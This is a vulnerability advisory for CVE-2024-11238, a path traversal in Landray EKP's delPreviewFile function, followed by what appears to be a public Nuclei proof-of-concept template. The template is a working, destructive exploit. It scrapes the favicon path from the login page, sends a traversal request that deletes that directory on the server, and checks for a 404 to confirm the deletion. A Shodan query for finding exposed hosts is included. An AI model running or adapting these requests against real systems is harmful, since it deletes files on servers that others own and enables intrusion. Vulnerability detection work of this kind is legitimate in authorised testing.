A vulnerability, which was classified as critical, was found in Landray EKP up to 16.0. This affects the function delPreviewFile of the file /sys/ui/sys_ui_component/sysUiComponent.do?method=delPreviewFile. The manipulation of the argument directoryPath leads to path traversal. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
PoC代码[已公开]
id: CVE-2024-11238
info:
name: Landray EKP - Path Traversal
author: theamanrawat
severity: medium
description: |
A vulnerability, which was classified as critical, was found in Landray EKP up to 16.0. This affects the function delPreviewFile of the file /sys/ui/sys_ui_component/sysUiComponent.do?method=delPreviewFile. The manipulation of the argument directoryPath leads to path traversal. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
impact: |
Remote attackers can access arbitrary files on the server, potentially leading to information disclosure or system compromise.
remediation: |
Update to the latest version that addresses this vulnerability or apply appropriate patches.
reference:
- https://github.com/CoinIsMoney/TempGuide/blob/main/LL-exp-02.pdf
- https://nvd.nist.gov/vuln/detail/CVE-2024-11238
- https://vuldb.com/?ctiid.284673
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
cvss-score: 6.5
cve-id: CVE-2024-11238
cwe-id: CWE-22
epss-score: 0.24789
epss-percentile: 0.95806
cpe: cpe:2.3:a:landray:landray_ekp:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: landray
product: landray_ekp
shodan-query: http.favicon.hash:831854882
tags: cve,cve2024,lfi,intrusive,vkev
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET /login.jsp HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
internal: true
extractors:
- type: regex
part: body
name: faviconPath
internal: true
group: 1
regex:
- 'href="/resource/(.*?)/favicon.ico"'
- raw:
- |
GET /resource/{{faviconPath}}/favicon.ico HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
internal: true
- raw:
- |
GET /sys/ui/sys_ui_component/sysUiComponent.do?method=delPreviewFile&directoryPath=../{{faviconPath}}/ HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- content_length == 0
condition: and
internal: true
- raw:
- |
GET /resource/{{faviconPath}}/favicon.ico HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 404
# digest: 4b0a00483046022100f3416bc63f4f18762b62a994e90775131debe63311baea81c409240131e08f26022100ff7db2b42dac30820da786c73f563c403e2ea9bd9d2564fa17a70ff8874bd753:922c64590222798bb761d5b6d8e72950